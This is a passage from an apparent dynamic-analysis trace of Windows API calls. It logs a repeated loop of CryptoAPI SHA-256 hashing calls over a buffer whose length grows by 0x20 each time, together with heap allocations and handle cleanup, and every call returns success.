	[0102.105] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x246798, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246798, pdwDataLen=0x12941c) returned 1
	[0102.105] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.105] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.105] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.106] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.106] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0xcc0, dwFlags=0x0) returned 1
	[0102.106] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.106] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2467c0
	[0102.106] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x2467c0, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x2467c0, pdwDataLen=0x12941c) returned 1
	[0102.106] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.106] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.106] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.106] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.106] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0xce0, dwFlags=0x0) returned 1
	[0102.106] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.106] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2467e8
	[0102.106] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x2467e8, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x2467e8, pdwDataLen=0x12941c) returned 1
	[0102.106] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.106] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.106] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.107] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.107] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0xd00, dwFlags=0x0) returned 1
	[0102.107] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.107] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246810
	[0102.107] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x246810, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246810, pdwDataLen=0x12941c) returned 1
	[0102.107] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.107] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.107] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.107] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.107] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0xd20, dwFlags=0x0) returned 1
	[0102.107] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.107] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246838
	[0102.107] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x246838, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246838, pdwDataLen=0x12941c) returned 1
	[0102.107] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.107] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.107] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.108] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.108] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0xd40, dwFlags=0x0) returned 1
	[0102.108] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.108] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246860
	[0102.108] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x246860, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246860, pdwDataLen=0x12941c) returned 1
	[0102.108] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.108] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.108] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.108] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.108] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0xd60, dwFlags=0x0) returned 1
	[0102.108] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.108] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246888
	[0102.108] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x246888, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246888, pdwDataLen=0x12941c) returned 1
	[0102.108] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.108] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.108] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.109] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.109] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0xd80, dwFlags=0x0) returned 1
	[0102.109] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.109] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2468b0
	[0102.109] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x2468b0, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x2468b0, pdwDataLen=0x12941c) returned 1
	[0102.109] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.109] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.109] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.110] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.110] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0xda0, dwFlags=0x0) returned 1
	[0102.110] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.110] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2468d8
	[0102.110] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x2468d8, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x2468d8, pdwDataLen=0x12941c) returned 1
	[0102.110] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.110] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.110] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.110] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.110] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0xdc0, dwFlags=0x0) returned 1
	[0102.110] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.110] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246900
	[0102.110] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x246900, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246900, pdwDataLen=0x12941c) returned 1
	[0102.110] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.110] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.110] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.111] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.111] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0xde0, dwFlags=0x0) returned 1
	[0102.111] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.111] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246928
	[0102.111] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x246928, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246928, pdwDataLen=0x12941c) returned 1
	[0102.111] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.111] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.111] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.111] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.111] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0xe00, dwFlags=0x0) returned 1
	[0102.111] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.111] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246950
	[0102.111] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x246950, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246950, pdwDataLen=0x12941c) returned 1
	[0102.111] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.111] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.111] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.112] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.112] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0xe20, dwFlags=0x0) returned 1
	[0102.112] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.112] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2469a8
	[0102.112] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x2469a8, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x2469a8, pdwDataLen=0x12941c) returned 1
	[0102.112] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.112] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.112] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.112] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.112] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0xe40, dwFlags=0x0) returned 1
	[0102.112] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.112] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2469d0
	[0102.112] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x2469d0, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x2469d0, pdwDataLen=0x12941c) returned 1
	[0102.112] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.112] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.112] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.113] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.113] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0xe60, dwFlags=0x0) returned 1
	[0102.113] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.113] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2469f8
	[0102.113] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x2469f8, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x2469f8, pdwDataLen=0x12941c) returned 1
	[0102.113] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.113] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.113] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.113] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.113] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0xe80, dwFlags=0x0) returned 1
	[0102.113] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.113] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246a20
	[0102.113] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x246a20, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246a20, pdwDataLen=0x12941c) returned 1
	[0102.113] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.113] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.113] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.114] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.114] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0xea0, dwFlags=0x0) returned 1
	[0102.114] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.114] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246a48
	[0102.114] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x246a48, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246a48, pdwDataLen=0x12941c) returned 1
	[0102.114] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.114] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.114] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.114] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.114] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0xec0, dwFlags=0x0) returned 1
	[0102.114] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.114] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246a70
	[0102.114] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x246a70, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246a70, pdwDataLen=0x12941c) returned 1
	[0102.114] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.114] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.114] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.115] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.115] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0xee0, dwFlags=0x0) returned 1
	[0102.115] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.115] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246a98
	[0102.115] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x246a98, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246a98, pdwDataLen=0x12941c) returned 1
	[0102.115] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.115] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.115] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.115] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.115] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0xf00, dwFlags=0x0) returned 1
	[0102.115] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.115] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246ac0
	[0102.115] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x246ac0, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246ac0, pdwDataLen=0x12941c) returned 1
	[0102.115] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.115] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.115] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.116] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.116] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0xf20, dwFlags=0x0) returned 1
	[0102.116] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.116] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246ae8
	[0102.116] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x246ae8, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246ae8, pdwDataLen=0x12941c) returned 1
	[0102.116] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.116] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.116] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.116] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.116] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0xf40, dwFlags=0x0) returned 1
	[0102.116] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.116] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246b10
	[0102.116] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x246b10, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246b10, pdwDataLen=0x12941c) returned 1
	[0102.116] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.116] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.116] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.117] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.117] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0xf60, dwFlags=0x0) returned 1
	[0102.117] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.117] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246b38
	[0102.117] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x246b38, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246b38, pdwDataLen=0x12941c) returned 1
	[0102.117] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.117] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.117] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.117] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.117] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0xf80, dwFlags=0x0) returned 1
	[0102.117] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.117] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246b60
	[0102.117] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x246b60, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246b60, pdwDataLen=0x12941c) returned 1
	[0102.117] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.117] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.117] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.118] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.118] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0xfa0, dwFlags=0x0) returned 1
	[0102.118] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.118] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246b88
	[0102.118] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x246b88, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246b88, pdwDataLen=0x12941c) returned 1
	[0102.118] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.118] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.118] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.118] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.118] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0xfc0, dwFlags=0x0) returned 1
	[0102.118] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.118] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246bb0
	[0102.118] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x246bb0, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246bb0, pdwDataLen=0x12941c) returned 1
	[0102.118] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.118] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.118] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.119] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.119] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0xfe0, dwFlags=0x0) returned 1
	[0102.119] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.119] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246bd8
